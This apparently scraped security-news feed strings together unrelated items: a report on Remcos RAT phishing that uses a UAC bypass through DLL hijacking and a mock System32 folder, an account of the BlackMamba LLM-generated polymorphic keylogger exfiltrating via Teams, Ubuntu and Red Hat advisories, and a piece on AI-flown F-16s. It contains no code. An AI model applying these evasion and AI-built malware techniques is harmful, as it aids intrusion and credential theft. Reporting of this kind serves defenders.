By Deeba Ahmed
Currently, scammers are using DBatLoader malware loader to distribute Remcos RAT to businesses and institutions across Eastern Europe. 
This is a post from HackRead.com Read the original post: Phishing Attack Uses UAC Bypass to Drop Remcos RAT Malware

****The phishing attack commences by sending malicious emails disguised as financial files, such as invoices.****

The cybersecurity researchers at SentinelOne have observed a new phishing campaign in which attackers are abusing the Windows User Account Control (UAC) bypass to distribute the DBatLoader and **Remcos RAT malware**. The primary targets of this campaign are organizations in Eastern Europe.

**New Phishing Campaign Delivering Remcos RAT**

According to SentinelOne, scammers are using DBatLoader malware loader to distribute Remcos RAT to businesses and institutions across **Eastern Europe**. The attackers use emails that seem to have come from authentic sources, such as reputed institutions in their target regions, to lure victims.

When they are successful in luring users into clicking on the malicious link included in the email’s content, the attackers easily leverage the malware loader, bypass Windows UAC, and drop Remcos RAT.

**How Does the Attack Occur?**

The attack commences by sending **phishing emails** disguised as financial files, such as invoices. These emails include a tar.lz archive containing the DBatLoader executable.

The phishing email as seen by SentinelOne

When the victim checks this email, they are lured into opening the DBatLoader’s initial stage payload, which is disguised as a LibreOffice, PDF, or MS Office document. Once this is done, the second-stage payload is retrieved from Google Drive or Microsoft OneDrive, one of which has been active for at least a month.

“When a user decompresses the attachment and runs the executable within, DBatLoader downloads and executes an obfuscated second-stage payload data from a public cloud location,” said SentinelOne’s Aleksandar Milenkoski.

According to SentinelOne’s **blog post**, the RAT is loaded only when DBatLoader executes a Windows batch script through a Windows UAC evasion technique involving **DLL hijacking** and mocking trusted directories. Through easinvoker.exe, Windows automatically elevates the process without issuing a UAC prompt when located in a trusted directory—the mock %SystemRoot%System32 directory.

**About Remcos RAT and DBatLoader**

DBatLoader abuses public cloud infrastructure for hosting its malware-loading capabilities. Remcos is a feature-rich RAT, which is frequently used by cybercriminals in espionage campaigns and is typically distributed via phishing emails.

Ukrainian CERT recently reported about **Remcos-based phishing campaigns** targeting state institutions for conducting espionage. In this instance, the attackers used password-protected archives as malicious email attachments.

This malware can collect keystrokes, video, audio, screenshots, and device or system-related information. Moreover, it can also deliver additional malware to the system.

1.  **New Python Malware Hits Windows Devices**
2.  **ElectroRat hits MacOS, Windows, Linux devices**
3.  **96% of New Malware in 2022 Targeted Windows**
4.  **Chinese Hackers Hide Malware in Windows Logo**
5.  **LodaRAT Windows malware hits Android Phones**
6.  **OpenAI’s ChatGPT Creates Polymorphic Malware**

Phishing Attack Uses UAC Bypass to Drop Remcos RAT Malware

Researchers warn that polymorphic malware created with ChatGPT and other LLMs will force a reinvention of security automation.

A proof-of-concept, artificial intelligence (AI)-driven cyberattack that changes its code on the fly can slip past the latest automated security-detection technology, demonstrating the potential for creating undetectable malware.

Researchers from HYAS Labs demonstrated the proof-of-concept attack, which they call BlackMamba, which exploits a large language model (LLM) — the technology on which ChatGPT is based — to synthesize a polymorphic keylogger functionality on the fly. The attack is "truly polymorphic" in that every time BlackMamba executes, it resynthesizes its keylogging capability, the researchers wrote.

The BlackMamba attack, outlined in a blog post, demonstrates how AI can allow the malware to dynamically modify benign code at runtime without any command-and-control (C2) infrastructure, allowing it to slip past current automated security systems that are attuned to look out for this type of behavior to detect attacks.

"Traditional security solutions like endpoint detection and response (EDR) leverage multi-layer, data intelligence systems to combat some of today’s most sophisticated threats, and most automated controls claim to prevent novel or irregular behavior patterns," the HYAS Labs researchers wrote. "But in practice, this is very rarely the case."

They tested the attack against an EDR system that was not identified specifically, but characterized as "industry leading," often resulting in zero alerts or detections.

Using its built-in keylogging ability, BlackMamba can collect sensitive information from a device, including usernames, passwords, and credit card numbers, the researchers said. Once this data is captured, the malware uses a common and trusted collaboration platform — Microsoft Teams — to send the collected data to a malicious Teams channel. From there, attackers can exploit the data in various nefarious ways, selling it on the Dark Web or using it for further attacks, the HYAS Labs researchers said.

"MS Teams is a legitimate communication and collaboration tool that is widely used by organizations, so malware authors can leverage it to bypass traditional security defenses, such as firewalls and intrusion detection systems," they wrote. "Also, since the data is sent over encrypted channels, it can be difficult to detect that the channel is being used for exfiltration."

Moreover, because BlackMamba's delivery system is based on an open source Python package, it allows developers to convert Python scripts into standalone executable files that can be run on various platforms, including Windows, macOS, and Linux, they wrote.

**What This Means for Modern Security**

AI-powered attacks like this will become more common now as threat actors create polymorphic malware that leverages ChatGPT and other sophisticated, data-intelligence systems based on LLM, according to the HYAS Labs researchers. This, in turn, will force automated security technology to evolve as well to manage and combat these threats.

“The threats posed by this new breed of malware are very real," the researchers wrote in the post. "By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today's predictive security solutions."

Typically, organizations that deploy EDR and other automated security controls as part of a modern security stack believe they're doing everything in their power to detect and prevent malicious activity. However, BlackMamba's use of AI now demonstrates that "they are not foolproof," the HYAS Labs researchers noted.

"The BlackMamba proof-of-concept shows that LLMs can be exploited to synthesize polymorphic keylogger functionality on-the-fly, making it difficult for EDR to intervene," they wrote.

The security landscape will have to evolve alongside attackers' use of AI to keep up with the more sophisticated attacks that are on the horizon, according to the researchers. Until then, it's imperative that organizations "remain vigilant, keep their security measures up to date," they advised, "and adapt to new threats that emerge by operationalizing cutting-edge research being conducted in this space."

AI-Powered 'BlackMamba' Keylogging Attack Evades Modern EDR Security

Ubuntu Security Notice 5936-1 - Evgeny Legerov discovered that Samba incorrectly handled buffers in certain GSSAPI routines of Heimdal. A remote attacker could possibly use this issue to cause Samba to crash, resulting in a denial of service. Tom Tervoort discovered that Samba incorrectly used weak rc4-hmac Kerberos keys. A remote attacker could possibly use this issue to elevate privileges.

    ==========================================================================Ubuntu Security Notice USN-5936-1March 08, 2023samba vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Samba.Software Description:- samba: SMB/CIFS file, print, and login server for UnixDetails:Evgeny Legerov discovered that Samba incorrectly handled buffers incertain GSSAPI routines of Heimdal. A remote attacker could possibly usethis issue to cause Samba to crash, resulting in a denial of service.(CVE-2022-3437)Tom Tervoort discovered that Samba incorrectly used weak rc4-hmac Kerberoskeys. A remote attacker could possibly use this issue to elevateprivileges. (CVE-2022-37966, CVE-2022-37967)It was discovered that Samba supported weak RC4/HMAC-MD5 in NetLogon SecureChannel. A remote attacker could possibly use this issue to elevateprivileges. (CVE-2022-38023)Greg Hudson discovered that Samba incorrectly handled PAC parsing. On32-bit systems, a remote attacker could use this issue to escalateprivileges, or possibly execute arbitrary code. (CVE-2022-42898)Joseph Sutton discovered that Samba could be forced to issue rc4-hmacencrypted Kerberos tickets. A remote attacker could possibly use this issueto escalate privileges. This issue only affected Ubuntu 20.04 LTS andUbuntu 22.04 LTS. (CVE-2022-45141)WARNING: This update upgrades the version of Samba to 4.15.13. Please seethe upstream release notes for important changes in the new version:https://www.samba.org/samba/history/samba-4.15.0.htmlIn addition, the security fixes included in this new version introduceseveral important behavior changes which may cause compatibility problemsinteracting with systems still expecting the former behavior. Please seethe following upstream advisories for more information:https://www.samba.org/samba/security/CVE-2022-37966.htmlhttps://www.samba.org/samba/security/CVE-2022-37967.htmlhttps://www.samba.org/samba/security/CVE-2022-38023.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   samba                           2:4.15.13+dfsg-0ubuntu0.20.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-5936-1   CVE-2022-3437, CVE-2022-37966, CVE-2022-37967, CVE-2022-38023,   CVE-2022-42898, CVE-2022-45141Package Information:   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu0.20.04.1

Ubuntu Security Notice USN-5936-1

Red Hat Security Advisory 2023-1109-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

Red Hat Security Advisory 2023-1109-01

After successful autonomous flight tests in December, the military is ramping up its plans to bring artificial intelligence to the skies.

On the morning of December 1, 2022, a modified F-16 fighter jet codenamed VISTA X-62A took off from Edwards Air Force Base, roughly 60 miles north of Los Angeles. Over the course of a short test flight, the VISTA engaged in advanced fighter maneuver drills, including simulated aerial dogfights, before landing successfully back at base. While this may sound like business as usual for the US’s premier pilot training school—or like scenes lifted straight from _Top Gun: Maverick_—it was not a fighter pilot at the controls but, for the first time on a tactical aircraft, a sophisticated AI.

Overseen by the US Department of Defense, VISTA X-62A undertook 12 AI-led test flights between December 1 and 16, totaling more than 17 hours of autonomous flight time. The breakthrough comes as part of a drive by the United States Air Force Vanguard to develop unmanned combat aerial vehicles. Initiated in 2019, the Skyborg program will continue testing through 2023, with hopes of developing a working prototype by the end of the year. 

The VISTA program is a crucial first step toward these goals, M. Christopher Cotting, director of research at USAF Test Pilot School, explains. “This approach, combined with focused testing on new vehicle systems as they are produced, will rapidly mature autonomy for uncrewed platforms and allow us to deliver tactically relevant capability to our warfighter,” he says. 

With Ukraine’s use of semiautonomous drones, the US military’s first autonomous flight of a Black Hawk helicopter last November, and the successful testing of AI algorithms in US U-2 spy planes in 2020, it’s clear that autonomous combat represents the next front in modern warfare. But just how completely will AI take over our skies, and what does it mean for the human pilots left on the ground?

The VISTA X-62A (short for Variable In-flight Simulation Test Aircraft) has always been ahead of its time. Built in the 1980s and based on an F-16D Block 30 Peace Marble Il, the plane previously held the designation NF-16D and became the US Airforce Test Pilot School’s go-to simulation machine in the early 1990s. A versatile and adaptable training tool boasting open systems architecture, the VISTA can be fitted with software that allows it to mimic the performance characteristics of multiple aircraft, from heavy bombers to ultra-light fighter jets. 

Prior to last year’s autonomous flight tests, the VISTA received a much-needed update in the form of a “model following algorithm” (MFA) and a “system for autonomous control of the simulation” (SACS) from Lockheed Martin’s Skunk Works. Combined with the VISTA Simulation System from defense and aerospace company Calspan Corporation, these updates facilitated an emphasis on autonomy and AI integration. 

Utilizing General Dynamics’s Enterprise-wide Open Systems Architecture (E-OSA) to power the Enterprise Mission Computer version 2 (EMC2, or Einstein Box), the SACS system also integrates advanced sensors, a set of Getac tablet displays in both cockpits, and multilevel security features, all of which enhance VISTA’s capabilities, including its rapid-prototyping advantage, which allows for speedy software updates to meet the accelerating pace of AI development.

During testing in December, a pair of AI programs were fed into the system: the Air Force Research Laboratory’s Autonomous Air Combat Operations (AACO) and the Defense Advanced Research Projects Agency’s (DARPA) Air Combat Evolution (ACE). AACO’s AI agents focused on combat with a single adversary beyond visual range (BVR), while ACE focused on dogfight-style maneuvers with a closer, “visible” simulated enemy.

While VISTA requires a certified pilot in the rear cockpit as backup, during test flights, an engineer trained in the AI systems manned the front cockpit to deal with any technical issues that arose. In the end, these issues were minor. While not able to elaborate on the intricacies, DARPA program manager Lt. Col. Ryan Hefron explains that any hiccups were “to be expected when transitioning from virtual to live.” All in all, it was a significant step toward realizing Skyborg’s aim of getting autonomous aircraft off the ground as soon as possible.

The Department of Defense stresses that AACO and ACE are designed to supplement human pilots, not replace them. In some instances, AI copilot systems could act as a support mechanism for pilots in active combat. With AACO and ACE capable of parsing millions of data inputs per second, and having the ability to take control of the plane at critical junctures, this could be vital in life-or-death situations. For more routine missions that do not require human input, flights could be entirely autonomous, with the nose-section of planes being swapped out when a cockpit is not required for a human pilot.

“We’re not trying to replace pilots, we’re trying to _augment_ them, give them an extra tool,” Cotting says. He draws the analogy of soldiers of bygone campaigns riding into battle on horses. “The horse and the human had to work together,” he says. “The horse can run the trail really well, so the rider doesn’t have to worry about going from point A to B. His brain can be freed up to think bigger thoughts.” For example, Cotting says, a first lieutenant with 100 hours of experience in the cockpit could artificially gain the same edge as a much higher-ranking officer with 1,000 hours of flight experience, thanks to AI augmentation.

For Bill Gray, chief test pilot at the USAF Test Pilot School, incorporating AI is a natural extension of the work he does with human students. “Whenever we \[pilots\] talk to engineers and scientists about the difficulties of training and qualifying AI agents, they typically treat this as a new problem,” he says. “This bothers me, because I have been training and qualifying highly non-linear and unpredictable natural intelligence agents—students—for decades. For me, the question isn’t, ‘Can we train and qualify AI agents?’ It’s, ‘Why can we train and qualify humans, and what can this teach us about doing the same for AI agents?’

Gray believes AI is “not a wonder tool that can solve all of the problems,” but rather that it must be developed in a balanced approach, with built-in safety measures to prevent costly mishaps. An overreliance on AI—a “trust in autonomy”—can be dangerous, Gray believes, pointing out failures in Tesla’s autopilot program despite Tesla asserting the need for the driver to be at the wheel as a backup. Cotting agrees, calling the ability to test AI programs in the VISTA a “risk-reduction plan.” By training AI on conventional systems such as the VISTA X-62—rather than building an entirely new aircraft—automatic limits and, if necessary, safety pilot intervention can help prevent the AI from endangering the aircraft as it learns.

The USAF’s technology is advancing rapidly. This past December, trial flights for ACE and ACCO were often completed within hours of each other, with engineers switching autonomy algorithms onboard the VISTA in minutes, without safety or performance issues, according to Cotting. In one instance, Cotting describes uploading new AI at 7:30 am and the plane being ready to test by 10 am.

“Once you get through the process of connecting an AI to a supersonic fighter, the resulting maneuvering is endlessly fascinating,” says Gray. “We have seen things that make sense, and completely surprising things that make no sense at all. Thanks to our safety systems, programmers are changing their models overnight, and we’re engaging them the next morning. This is unheard of in flight control system development, much less experimentation with unpredictable AI agents.”

Despite these successes, it will take some time before the curriculum at the USAF Test Pilot School undergoes an AI overhaul. Cotting explains that the newness of the AACO and ACE platforms means students will require a greater level of understanding before trying them out in the cockpit of the VISTA. “We’re basically building the bridge as we’re driving over,” Cotting says.

In the meantime, students will undergo a broader test this fall in which they’re exposed to a set of AI and have to figure out how to test it, then execute that test.

As for wider military applications, Cotting says that while he has no visibility into these areas, AI is already ubiquitous in image recognition technology used across the military. While AI-driven tanks may not be on the horizon just yet, the skies, it seems, are set to be home to a new kind of intelligence.

The US Air Force Is Moving Fast on AI-Piloted Fighter Jets

Red Hat Security Advisory 2023-1130-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include null pointer and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:1130-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1130  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-2964 CVE-2022-4269 CVE-2022-41222   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: mm/mremap.c use-after-free vulnerability (CVE-2022-41222)

* kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
(CVE-2022-4269)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* WARNING: CPU: 116 PID: 3440 at arch/x86/mm/extable.c:105  
ex_handler_fprestore+0x3f/0x50 (BZ#2134587)

* fix for "CoW after fork() issue" aka "vmsplice child -> parent attack"  
aka "GUP after fork bug" (BZ#2137546)

* Hardware error: RIP: copy_user_enhanced_fast_string+0xe (BZ#2137593)

* i40e: orphaned-leaky memory when interacting with driver memory  
parameters (BZ#2138206)

* RHEL 8.7 - Outputs of lsmem, lparstat, numactl and /proc/meminfo show  
wrong value of memory when LMB size is set to 4GB. (BZ#2140091)

* RHEL8.7: tcp sessions hanging after ibmvnic failover on Denali  
(BZ#2140958)

* RHEL8: Practically limit "Dummy wait" workaround to old Intel systems  
(BZ#2142171)

* RHEL:8.6+ IBM Partner issue - Loopback driver with ABORT_TASKS causing  
hangs in scsi eh, this bug was cloned for RHEL8.6 and need this patch in  
8.6+ (BZ#2144584)

* i40e,iavf: SR-IOV VF devices send GARP with wrong MAC address  
(BZ#2149746)

* RHEL8.4 - boot: Add secure boot trailer (BZ#2151531)

* error 524 from seccomp(2) when trying to load filter (BZ#2152139)

* The "kernel BUG at mm/usercopy.c:103!" from BZ 2041529 is back on  
rhel-8.5 (BZ#2153231)

* kernel BUG: scheduling while atomic: crio/7295/0x00000002 (BZ#2154461)

* MSFT MANA NET Patch RHEL-8: Fix race on per-CQ variable napi_iperf panic  
fix (BZ#2155438)

* GSS: OCP 4.10.30 node crash after ODF upgrade : unable to handle kernel  
NULL pointer dereference at 0000000000000000 :  
ceph_get_snap_realm+0x68/0xa0 [ceph] (BZ#2155798)

* RHEL8.8: Backport upstream patches to reduce memory cgroup memory  
consumption and OOM problem (BZ#2157923)

* 'date' command shows wrong time in nested KVM s390x guest (BZ#2158814)

* Kernel FIPS-140-3 requirements - part 3 - AES-XTS (BZ#2160173)

* ethtool -m results in an out-of-bounds slab write in the be2net driver  
(BZ#2160183)

* i40e/iavf: VF reset task fails "Never saw reset" with 5 second timeout  
per VF (BZ#2160461)

* Mellanox: backport "net/mlx5e: TC NIC mode, fix tc chains miss table"  
(BZ#2161630)

* Kernel panic observed during VxFS module unload (BZ#2162764)

* iavf: It takes long time to create multiple VF interfaces and the VF  
interface names are not consistent (BZ#2163259)

* In FIPS mode, the kernel should reject SHA-224, SHA-384, SHA-512-224, and  
SHA-512-256 as hashes for hash-based DRBGs, or provide an indicator after  
2023-05-16 (BZ#2165133)

* panic in fib6_rule_suppress+0x22 with custom xdp prog involved in  
(BZ#2167604)

* net/mlx5e: Fix use-after-free when reverting termination table  
(BZ#2167641)

* Update intel_idle for Eaglestream/Sapphire Rapids support (BZ#2168357)

* GSS: Set of fixes in ceph kernel module to prevent OCS node kernel crash  
- -  blocklist the kclient when receiving corrupted snap trace (BZ#2168898)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2138818 - CVE-2022-41222 kernel: mm/mremap.c use-after-free vulnerability  
2150272 - CVE-2022-4269 kernel: net: CPU soft lockup in TC mirred egress-to-ingress action

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kernel-4.18.0-372.46.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.46.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-devel-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.46.1.el8_6.aarch64.rpm  
perf-4.18.0-372.46.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.46.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.46.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.46.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.46.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.46.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.46.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.46.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.46.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.46.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.46.1.el8_6.s390x.rpm  
perf-4.18.0-372.46.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.46.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.46.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.46.1.el8_6.x86_64.rpm  
perf-4.18.0-372.46.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.46.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.46.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.46.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.46.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.46.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-41222  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAiXMtzjgjWX9erEAQguWhAApNLcz2ltZLXkAZ/HPY3boTCnDVnFlYD6  
We5JcFRn45M//ACx7tuHfQIYU4STA+iJiACBf9IJjPaUYrfjJ13/XCV2OMQof6Or  
vEUemfX8pDIU4gMPWD6E4yffDRdW+e54inSGvSxc6IRPRefm5mcnEiWxlvF+Fc6U  
rsn8zdZahByGpMfocORIx9XjjBUgNR33KByYWKIvdmw4RSAOXblCmMzQWgRSr/iW  
j3HqNrR4wwgZE7hdtvOb9RJ70x/JPXtQEROr8nfZYtXJ10LqdyvmyCCVX4DmP89W  
5n4yWDaLHbeqWferMDLa3faCFIpXoHAWzMhX4FfriVdIMTx8f7B+p7jdeUhDg+PU  
/kv2tIQLy4QYADFaA5VCIEgPhgMFbmJqrwaW2Hec9H1w8wsLW8SV1HUxZyLJ1jKn  
fmgK71PlCG/emt1fXlNkeh8l+JXO0MfXb4KrGEjAWgVleQhiwXSh62EaIRiPfp77  
4byX1ZSFBbp6bno0NR5pmYSM8jgMR1JqpWP0eIOUBncAacEhZqzD+EXMZ2ZRfMLZ  
QrAGFkC3AG6KE3/UjIgdSf7QTiw7bozwAdhOZOn+X5IZfbqOykyI/g93QuIJcREl  
